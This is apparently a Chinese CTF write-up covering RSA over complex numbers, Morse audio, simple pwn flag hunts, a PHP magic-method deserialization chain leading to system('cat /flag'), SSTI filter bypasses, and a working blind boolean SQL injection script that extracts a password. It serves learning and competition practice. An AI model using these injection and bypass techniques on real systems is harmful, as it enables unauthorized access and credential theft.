CRYPTO

T1

复数域应用RSA，$\varphi$ 取 $(p^2-1)(q^2-1)$ .

MISC

T1

摩尔斯电码，用Audacity打开频谱图就能看见了.

PWN

T1

flag1是根目录下的一个程序，添加权限运行；
flag2是一个隐藏文件，文件名：.flag2；
flag3在环境变量里.

REVERSE

无事发生.

WEB

T1

PHP的魔术方法：

传送门

字符串解析首先进入__destruct()，接着返回的字符串进入__tostring()，然后返回的是函数类型可以进入__invoke()，接着由于指向了不存在的flash就可以触发__get().
最后由于指向的championpoint()函数是私有函数，在外部访问就会触发__call()，然后执行date("Y-m-d H:i:s")命令. 这里只需要将变量kk改为system、RieNs改为cat /flag，即可执行命令system("cat /flag")，获得flag.

T2

SSTI注入+常规字符串绕过. 由于.__class__等效于["__class__"]，且一个字符串等效于多个字符串连接，所以.__class__不允许用改成["__cla""ss__"]就好了. 其余关键字同理.

T3

SQL注入. 只是查询错误会显示“查询失败”而不是详细信息罢了. 发现查询字符串password后面连接OR 1<2不回显任何内容，而连接OR 1>2回显“用户名或密码错误！”.
因此，可以设计一个二分的方法逐位推断密码.

点击查看代码

import requests

s = requests.Session()
url = 'http://***/login.php'
flag = ''

def exp(i, j):
    payload = f"or (ascii(substr(password,{i},1))>{j})#"
    data = {
        "username": "admin\\",
        "password": payload
    }
    r = s.post(url, data=data)
    if "用户名或密码错误！" in r.text:
        return False
    else:
        return True

for i in range(1, 100):
    low = 32 
    high = 127
    while (low <= high):
        mid = (low + high)//2
        if (exp(i, mid)):
            low = mid + 1
        else:
            high = mid - 1
    flag += chr((low+high+1)//2)
    print(flag)

运行结果：

点击查看代码

noilinux@noilinux:~/桌面$ python3 a.py
i
in
ins
ins0
ins0m
ins0mn
ins0mn1
ins0mn1a
ins0mn1a0
ins0mn1a09
ins0mn1a090
ins0mn1a0903
ins0mn1a0903H
ins0mn1a0903Ha
ins0mn1a0903Hah
ins0mn1a0903HahA
ins0mn1a0903HahA

出来密码就好办了. 登录后修改链接至根目录即可获取flag.

T4

在T2的基础上增加了禁止使用单引号的规则. 然而双引号可以使用，因此在“引号套引号”的字符串里，将'改为\"即可. 其余禁止使用的关键字还是利用字符串绕过的方法.